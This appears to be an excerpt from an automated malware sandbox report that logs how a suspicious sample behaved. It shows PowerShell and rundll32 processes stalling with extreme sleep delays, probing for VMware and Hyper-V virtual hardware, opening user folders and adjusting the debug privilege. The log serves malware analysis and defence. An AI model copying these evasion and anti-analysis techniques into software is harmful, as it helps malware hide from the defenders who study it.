    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8764Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 839Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8845
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 771
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7444
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1624
    Source: C:\Windows\System32\loaddll64.exe TID: 6628Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144Thread sleep time: -5534023222112862s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320Thread sleep count: 8845 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5772Thread sleep count: 771 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4340Thread sleep time: -6456360425798339s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040Thread sleep time: -3689348814741908s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 340Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior
    Source: rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: rundll32.exe, 00000003.00000002.2312179824.000001D602CEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPG
    Source: rundll32.exe, 00000004.00000002.2312083818.000001CFA519C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
    Source: rundll32.exe, 00000003.00000002.2312179824.000001D602D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA519C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA5108000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA51C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2388934623.0000023142F32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
    Source: netsh.exe, 00000005.00000003.1718017743.0000019CC3315000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUUO
    Source: netsh.exe, 0000000C.00000003.1775934945.0000027292B14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: netsh.exe, 00000006.00000003.1718018963.00000210077E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
